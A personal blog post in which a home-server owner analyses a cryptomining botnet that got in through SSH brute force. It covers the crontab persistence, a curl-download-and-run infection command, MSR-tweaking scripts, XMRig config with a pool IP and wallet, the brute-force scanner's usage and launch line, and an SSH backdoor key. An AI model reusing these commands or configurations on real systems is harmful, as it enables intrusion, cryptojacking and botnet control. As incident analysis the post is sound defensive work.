My server was infected

My dad called me in the morning, that he can’t login to the internet banking, because our IP was marked as malicious by brightcloud.com, which the banking provider uses for access checks. Fist I just rolled my eyes, because my home network is regularly marked as dangerous just because my port 25 is open, which is probably something uncommon, I don’t know.

I didn’t pay much attention though, unless I got an email from my ISP that my network probably contains infected device that scans internet. At this point I started to smell something rotten. I have very good experience with my ISP tech support and I knew that they would not send me an email for no reason.

I logged to the server and indeed, all cpus fully saturated, although no network activity was seen. Luckily I have collectd deployed and so I was able to check the past activity. Indeed, there was unusual activity visible on the chart.

There was no doubt. My uplink was fully saturated between Wednesday ~18:30 and Thursday 12:00.

It is by the way impressive, how fast my ISP detected the malicious behaviour in my network. Their email mentioned that problems occurred at 18:35, which means that it took less than 15 minutes to correctly classify. I put in my todo list to implement something similar because it is a bit embarassing that I had to learn about my server being infected from someone else.

So I fired up the process explorer and started looking for suspicious activity. Not so hard actually, because all cores were fully saturated by a process called kswapd0. This process manages swap and it can use a lot of cpu, but two things were suspicious to me. I don’t have swap set up on my server (experimental setup), and the kswapd0 was running under peertube user. I recently experimented with peertube just for fun and I didn’t expect the instance to be up for a long time, hence I made the mistake of not taking security of its account very seriously.

I am aware that I deserved the malware because of my ignorance, but it was already there, so let’s play with it a little.

Malware

First I listed opened files of hostile kswapd0 and found out that the working directory was /tmp/.X25-unix/.rsync/a/. I didn’t want to lose track, so I didn’t delete the folder immediately. Next I checked for another processes of the compromised user and I found out a process called tsm, executed from /tmp/.X25-unix/.rsync/c/lib64/.

Ok, so I shoot down all suspicious processes, backed the /tmp/.X25-unix/ directory (with chmod -R a-x as a primitive security measure to prevent myself accidentaly launch the malware manually) and deleted the original one in /tmp. I never before hunted a malware, but I was aware that they are pretty sleazy beasts. So, how could such a program become persistent?

Commonly misused for this is the crontab, so I checked it with crontab -u peertube -l. Bingo, the crontab contained five entries pointing to the $PEERTUBE_HOME/.configrc/. This revealed to me another infected location that I backed up and wiped.

mkdir -p /tmp/.X25-unix/;curl -L <malicious ip> > dota3.tar.gz;
tar xf dota3.tar.gz; .rsync/initall
I did not caught the initial infection command, but I assume it looked similarly to this one.

The archive dota3.tar.gz indeed seems to be the initial source of infection. It contains a directory .rsync with subdirectories a, b, c and a bunch of files with about 260 lines of shell code (reported by tokei). In the .rsync directory are three files with init in its name, but only .rsync/initall calls the other two files (init, init2) and therefore seems as the main entry point.

The initall script first removes some files and directories from /tmp, executes init script, then switeches to users home and executes init2. It also kills -9 some processes (that are later executed again, it seems that the scripts is killing instances of itself in case that the same computer was infected multiple times).

The whole initialization mainly copies the directories a, b and c to ~/.configrc and invokes initialization of these three modules.

Module a

This module contains three shell scripts and an executable called kswapd0. The one that I’ve found gobbling all my CPU time.

Installation script is eponymous with the module. I find interesting, that the parent install script tries to execute a/init0, despite the fact that there is no such file in the initial archive, nor is it created in the previous steps. It will probably be created later and it is maybe a measure to deal with partial deletion of the malware.

The a/a install script first creates a file upd (that is later referenced in a crontab). Interesting thing here is that the malware tries to turn on the nr_hugepages system feature. I do not know whether is it as a performance tuning, or to expose some speculative errors in the CPU. The later would be probably not necessary, because when the malware is able to use sysctl, it does not need to use speculative errors to steal data, because it already runs with high enough privileges to get whatever it wants more easily. My personal tip would be that it is a performance tuning, but it is only a guess.

Then the script detects what hardware is it running on, and tries to write to a few MSRs.

if cat /proc/cpuinfo | grep "AMD Ryzen" > /dev/null;
        then
                echo "Detected Ryzen"
                wrmsr -a 0xc0011022 0x510000
                wrmsr -a 0xc001102b 0x1808cc16
                wrmsr -a 0xc0011020 0
                wrmsr -a 0xc0011021 0x40
                echo "MSR register values for Ryzen applied"
elif cat /proc/cpuinfo | grep "Intel" > /dev/null;
        then
                echo "Detected Intel"
                wrmsr -a 0x1a4 6
                echo "MSR register values for Intel applied"
else
        echo "No supported CPU detected"
fi

By looking to Intel SDM, Volume 4, we see that the write is to a msr MSR_MISC_FEATURE_CONTROL. This MSR is apparently present on selected CPUS (Intel Atom, Nehalem, Sandy Bridge). Writing 6 to it (0b110) sets bits one and two which looks like disabling L2 Adjacent Cache Line Prefetcher and DCU Hardware Prefetcher. Why exactly this is done I have no idea.

It is also interesting how the malware prints nice logs.

The initscript then launched ./upd which it created by echoing code to the file and the ./upd in turn executed ./run. The ./run script checks whether it is on 64 or 32 bit architecture and executes ./kswapd0, respective ./anacron.

The ./kswapd0 is a statically linked ELF executable, compiled probably with high level of optimization based on how the assembly looks.

Analysis of strings in this binary shows that it is renamed (modified?) XMRig cryptocurrency mining program.

36459
36460
36461
36462
36463
36464
36465
36466
36467
36468
36469
36470
36471
36472
36473
36474
36475
36476
36477
36478
36479
36480
36481
36482
36483
36484
36485
36486
36487
36488
36489
36490
36491
36492
36493
36494
36495
36496
36497
36498
36499
36500
36501
36502
36503
36504
36505
36506
36507
 Usage: xmrig [OPTIONS]
 Network:
   -o, --url=URL                 URL of mining server
   -a, --algo=ALGO               mining algorithm https://xmrig.com/docs/algorithms
       --coin=COIN               specify coin instead of algorithm
   -u, --user=USERNAME           username for mining server
   -p, --pass=PASSWORD           password for mining server
   -O, --userpass=U:P            username:password pair for mining server
   -x, --proxy=HOST:PORT         connect through a SOCKS5 proxy
   -k, --keepalive               send keepalived packet for prevent timeout (needs pool support)
       --nicehash                enable nicehash.com support
       --rig-id=ID               rig identifier for pool-side statistics (needs pool support)
   -r, --retries=N               number of times to retry before switch to backup server (default: 5)
   -R, --retry-pause=N           time to pause between retries (default: 5)
       --user-agent              set custom user-agent string for pool
       --donate-level=N          donate level, default 1%% (1 minute in 100 minutes)
       --donate-over-proxy=N     control donate over xmrig-proxy feature
       --no-cpu                  disable CPU mining backend
   -t, --threads=N               number of CPU threads
   -v, --av=N                    algorithm variation, 0 auto select
       --cpu-affinity            set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
       --cpu-priority            set process priority (0 idle, 2 normal to 5 highest)
       --cpu-max-threads-hint=N  maximum CPU threads count (in percentage) hint for autoconfig
       --cpu-memory-pool=N       number of 2 MB pages for persistent memory pool, -1 (auto), 0 (disable)
       --cpu-no-yield            prefer maximum hashrate rather than system response/stability
       --no-huge-pages           disable huge pages support
       --asm=ASM                 ASM optimizations, possible values: auto, none, intel, ryzen, bulldozer
       --argon2-impl=IMPL        argon2 implementation: x86_64, SSE2, SSSE3, XOP, AVX2, AVX-512F
       --randomx-init=N          threads count to initialize RandomX dataset
       --randomx-no-numa         disable NUMA support for RandomX
       --randomx-mode=MODE       RandomX mode: auto, fast, light
       --randomx-1gb-pages       use 1GB hugepages for RandomX dataset (Linux only)
       --randomx-wrmsr=N         write custom value(s) to MSR registers or disable MSR mod (-1)
       --randomx-no-rdmsr        disable reverting initial MSR values on exit
       --randomx-cache-qos       enable Cache QoS
   -S, --syslog                  use system log for output messages
   -l, --log-file=FILE           log all output to a file
       --print-time=N            print hashrate report every N seconds
       --no-color                disable colored output
       --verbose                 verbose output
   -c, --config=FILE             load a JSON-format configuration file
   -B, --background              run the miner in the background
   -V, --version                 output version information and exit
   -h, --help                    display this help and exit
       --dry-run                 test configuration and exit
       --export-topology         export hwloc topology to a XML file and exit
       --pause-on-battery        pause mine on battery power
 XMRig 6.6.2
  built on Dec  6 2020 with GCC

The option --no-huge-pages gives us answer to why the installation script was trying to enable kernel hugepages.

I thought that if someting mines coins, it must have some payee address where the coins are stored. Such address would be almost certainly specified in the miners configuration.

According to the xmrig documentation, the config can be either on command line (where was none, because I’ve seen the launcher script), or in a json file located in the same directory as the binary (where was also none). I therefore further searched for some keys from the example configuration in the strings of the code and I indeed found an embedded json config snippet.

.config/xmrig.json
    "api": {
        "id": null,
        "worker-id": null
    },
    "http": {
        "enabled": false,
		...
    },
    "autosave": true,
    "version": 1,
    "background": true,
    "colors": true,
    "cpu": {
        "enabled": true,
        "huge-pages": true,
        "huge-pages-jit": false,
        "hw-aes": null,
        "priority": null,
        "memory-pool": false,
        "yield": true,
        "max-threads-hint": 100,
        "asm": true,
        "argon2-impl": null,
        "astrobwt-max-size": 550,
        "cn/0": false,
        "cn-lite/0": false,
        "kawpow": false
    },
    "opencl": {
        "enabled": false,
		...
    },
    "cuda": {
        "enabled": false,
		...
    },
    "donate-level": 0,
    "donate-over-proxy": 0,
    "log-file": null,
    "pools": [
        {
            "algo": null,
            "coin": "monero",
            "url": "45.9.148.117:80",
            "user": "483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS",
            "pass": "x",
            "rig-id": null,
            "nicehash": true,
            "keepalive": true,
            "enabled": true,
            "tls": false,
            "tls-fingerprint": null,
            "daemon": false,
            "self-select": null
        }...
    ]
}
A snippet of json configuration extracted from the xmrig binary. I left out the configuration of disabled features, and also provided only one pool config.

From the XMRig documentation it seems that the coins are not put on the wallet directly, but instead all the miners are connected to some pool, which probably stores the beneficiary wallet addresses. The snippet has configuration for multiple pools all within the IP range 45.9.148.0/24.

Checking some of the mining pools ip from config reveals that they were reported for the same reason as back as in 23. November 2020. Assuming that the reports and their timestamps are real, the first report about abuse of this IP was 14 days before the XMRig version I obtained was compiled (also assuming correct time on attackers computer). If both assumptions stands, the same IP was used between two different versions of malware.

The IP range is registered to company “Nice IT Customers Network” and probably it points to some server housing in Netherlands.

Feeding it to shodan (what a wonderful service) reveals nothing interesting, while nmap shows us 5 different open ports. Out of them three are openSSH (why?) and ports 80 and 443 are running some service over ssl. From the configuration log we already know, that the service on ports 80 (and 443, not showed in the log above) are exposing interface of mining pool director or maybe xmrig-proxy. Examining the ports 80 and 443 with openssl(1) subcommand s_client reports that both services are using the same self-signed certificate with CN=localhost, issued on Jul 24 14:20:07 2020 GMT and valid for 10 years.

What makes no sense to me is that the key "tls" is set to false in all pool configurations in the json snippet above. At first sight it seems that this configuration should be unable to connect to the remote service, which is tunelled over tls. This thing I don’t really understand.

$ nmap -sV 45.9.148.117
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-22 09:32 CEST
Nmap scan report for 45.9.148.129
Host is up (0.033s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
21/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  ssl/http?
222/tcp open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
443/tcp open  ssl/https?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Examining the three opened ssh ports by ssh shows the same host key fingerprint, which makes me think that these ports are not tunelled to other machine, but are really only three opened ports of the same openssh instance. I don’t see any benefits of this setup, but then I probably miss some trick.

Module b

This module is the simplest one as it contains only three files. The entry file seems to be called a again and it mainly calls the other two files, first ./stop and then ./run. The ./stop script kills another set of proceses probably not to share the machine with anyone.

The ./run file has only two files, but almost 47 KiB.

Let’s start with the second line. It removes the existing ~/.ssh and replaces it with its own version with only one authorized key (ssh-rsa key with comment “mdrfckr”…). I initially missed this one, so it pointed me to another location that had to be wiped. This was literally a backdoor and it is very likely that the malware would reinstall itself using this entry vector.

The fist line is literally echo "..." | base64 --decode | perl. The decoded string still wasn’t human readable, because it contained only eval unpack u => q{_....... I never wrote a single line in perl, but luckily replacing the eval with print revealed the program to me.

The resulting code was actually pretty nice. The variables were not mangled and even the formating was preserved.

After some time spent by reading the code, two things became obvious.

  1. It is an IRC client. Probably a relative of this old script from 2012.
  2. It is full of portugese. Variable names, error messages, everything was Portugese.

An IRC client obviously need an IRC server, so I grep(1)ed for urls and IP addresses in the Perl code. And what a suprise, the default IRC server is 45.9.148.99, again in the same known IP range as the pool. At the time of writing this post the machine was offline. Consulting the IP with shodan discloses that the machine was last seen online on April 10. 2022, with two opened ports (443 and 6667) that are both running unrealircd.

I assume that this is a remote control feature of the malware. It is also likely that the irc server machine is only taken online when new instructions are available for the botnet. Listening for the comunication of this server could provide an information about future attacks even before it really happens, but I don’t feel like creating a honeypot from my server.

Module c

This module is by far the most complex of the whole application. It traditionally contains few scripts that executes each other in obfuscated and seemingly random manner and a bunch of binaries, both executables and libraries. The most interesting part here is the file ip, which is about 700KiB of IP addresses (40k lines).

This file is not present in the original archive and is therefore likely that it was created on my computer. Indeed, the file is removed before and after execution of the binary tsm64 and the binary also gets filename ‘ip’ as its last parameter. Similar files contain pairs of users and their passwords, probably found by the parallel scanner.

Analyzing the binary tsm32 and tsm64 with strings(1) reveals a lot of error messages related to working of ssh protocol. The module also contains libraries libc, libnss_dns, libnss_files, libpthread and libresolv. All of them are present in two versions, one for 32 and one for 64 bits. My guess therefore is that this module is used to parallel scanning of IPv4 addresses. It is likely that this module was responsible for trigerring the red light at my ISPs desk. The network scanner is executed with timeout of 6 hours and between runs it sleeps for a random time.

9399
9400
9401
9402
9403
9404
9405
9406
9407
9408
9409
9410
9411
9412
9413
9414
9415
9416
9417
9418
9419
9420
9421
9422
9423
9424
 ---------------------->Faster than light<-----------------------------
 --------------------->use only for testing<---------------------------
 Use: scan [OPTIONS] [[USER PASS]] FILE] [IPs/IPs Port FILE]
 -t [NUMTHREADS]: Change the number of threads used. Default is %d
 -m [MODE]: Change the way the scan works. Default is %d
 -f [FINAL SCAN]: Does a final scan on found servers. Default is %d
 Use -f 1 for A.B class /16. Default is 2 for A.B.C /24
 -i [IP SCAN]: use -i 0 to scan ip class A.B. Default is %d
 if you use -i 0 then use ./scan -p 22 -i 0 p 192.168 as agrument for ip file
 -m 0 for non selective scanning
 -P 0 leave default password unchanged. Changes password by default.
 -s [TIMEOUT]: Change the timeout. Default is %ld
 -S [2ndTIMEOUT]: Change the 2nd timeout. Default is %ld
 -p [PORT]: Specify another port to connect to. 0 for multiport
 -c [REMOTE-COMMAND]: Command to execute on connect. Use ; or && with commands
 Use: ./scan -t 202 -s 5 -S 5 p ip -c "uname"
 Use: ./scan -t 202 -s 5 -S 5 -i 0 -p 22 p 192.168
 The example above will scan 192.168 port 22 and brute force the IP list.
 Use: ./scan -t 202 -s 5 -S 5 -p 0 p ip - for "ip port" file
 Use: ./scan -t 202 -s 5 -S 5 -p 23 -m 0 p ip - for other protocols
 When using -m 1 (default value) the scan will only target full linux
 machines or windows machines with openssh installed. Routers, busyboxes
 honeypots and other limited linux devices will be skipped from the output.
 Use -m 0 for non-selective scanning (can be used for all type of ssh devices)
 this includes busyboxes, routers, honeypots and other devices with limited
 commands. ================================================================
Around line 9300 in the strings output, I found the help string

The launcher script sets the $threads variable to 515, but if the machine is ARM, it is decreased to only 75. This is probably for infected Raspberry Pis and similar IoT toys. Despite this indice I found no binary compiled for ARM and hence I do not understand the purpose of this.

 timeout 6h ./tsm -t $threads -f 1 -s 12 -S 10 -p 0 -d 1 p ip
The comand used to execute the parallel scanner

The string 0.8.2 (c) 2003-2018 Aris Adamantiadis, Andreas Schneider and libssh contributors. Distributed under the LGPL, please refer to COPYING file for information about your rights lets us know why there is so much ssh related strings in the binary, because it is compiled with libssh.

Strings /home/test/ and /home/buH shows that the person compiling the malware was enough cautious to not build it on own workstation and didn’t leak its username.

By analysis of strings in the c/lib/64/tsm binary it seems that it is renamed ld.so.

Lessons learned

I was unable to track the initial entry vector. First I suspected that the entry vector was via peertube application, but from various sources on the internet and analysis of the binaries I learned that it uses ssh and brute forcing passwords. This matches with a misconfiguration found on my server, where I accidentaly didn’t disable password auth over ssh. I keep configuration of my servers as ansible playbook in a git repository, but this christmas I made some major rewrite of the config and this part somehow disappeared from the new version. The configuration was updated accordingly, and so this should no longer be an issue (though without removing the backdoor ssh certificate this would not protect against re-infection).

I also modified the fstab and now /tmp and the whole RAID are mounted as noexec. This is also not bulletproof, but studying the source codes of this malware suggests, that if it is not able to execute binaries in /tmp, it would not be able to proceed. Such security measure can be bypassed by cat script | sh, and the malware indeed uses this invocation sometimes, but not only and it relies on the direct invocation in about half cases.

As far as I can tell with my limited knowledge of malware tricks, this was one of those less harmful/less smart beasts and I was lucky to not get anything worse.

Resources